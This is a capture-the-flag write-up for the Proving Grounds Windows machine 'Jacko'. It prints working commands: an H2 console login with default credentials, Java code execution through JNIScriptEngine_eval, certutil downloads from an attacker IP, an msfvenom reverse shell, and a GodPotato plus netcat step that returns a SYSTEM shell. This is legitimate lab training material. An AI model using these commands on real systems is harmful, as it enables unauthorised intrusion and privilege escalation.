Jacko

Source: Proving Grounds OS: Windows Community Rating: Hard

Enumeration & Reconnaissance

  • I started with the usual autorecon and was hit with a slew of open ports: 80, 135, 139, 445, 5040, 8082, 9092, 49664 -> 49669

  • I began with port 80 as usual, which presented an interface for the H2 Database Engine.

H2 Database Engine

Service Analysis

  • Checking online, I learned that H2 Database Engine has multiple vulnerabilities. Exploit DB with the ID, 49384 showed an exploit that allowed running Java code. I tried several automated PoCs with no luck. I kept searching for the correct method to interact with the engine, and it wasnโ€™t until I checked port 8082 that I found the proper login page.

H2 Login Page

Gaining Initial Access

  • Using the default credentials, sa with an empty password, I was able to log in without issue.

  • Following the CVE details, I managed to run commands successfully.

RCE

  • However, when I attempted to upload my shell and get a reverse shell, nothing worked. I ended up reverting the machine over and over, and after a few frustrating hours away, the same commands worked on my return. OffSec servers, always keeping you on your toes.

  • I finally uploaded and executed my reverse shell using the following queries:

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.45.170 LPORT=9911 #Generate Payload

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -split -f 
http://192.168.45.170/shell.exe C:/Windows/Temp/shell.exe").getInputStream()).useDelimiter("\Z").next()');
 
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:/Windows/Temp/shell.exe").getInputStream()).useDelimiter("\Z").next()');
Reverse Shell

Privilege Escalation

  • When I started checking privileges, running commands like whoami failed with the error: 'whoami' is not recognized as an internal or external command, operable program or batch file.

Path Issue

  • After searching, I discovered that the %PATH% environment variable was missing some key defaults. The issue was fixed after running:

set PATH=%PATH%;C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;

  • After that, checking privileges with whoami /priv confirmed I had SeImpersonatePrivilege, a huge relief that opened the door for escalation. I checked systeminfo and confirmed the system was Windows 10 x64, so I opted for GodPotato x64. I verified the .NET Framework version by running:

โ€ƒreg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"

  • which showed Version 4. Finally, I ran:

certutil -urlcache -split -f http://192.168.45.240/GodPotato-NET4.exe
certutil -urlcache -split -f http://192.168.45.240:901/nc.exe
.\GodPotato-NET4.exe -cmd ".\nc.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.170 9101"

  • The first attempt failed for reasons I couldnโ€™t pinpoint, but running GodPotato a second time succeeded, and I obtained a SYSTEM shell.

Privilege Escalation

Lessons Learned

  • H2 Interface Discovery: Checking alternate ports (like 8082) can reveal key interfaces not visible on the default port and help you not waste your time.

  • Default Credentials: Always try the default credentials, here, sa with an empty password was all it took.

  • Persistence Pays Off: I don't know for this one, maybe hope that OffSec servers are having a good day?

  • Environment Variables: Ensure your %PATH% is correctly set to avoid command execution issues.

  • Privilege Escalation: Always check the privileges, Potatos are awesome!

PreviousSquidNextDVR4

Last updated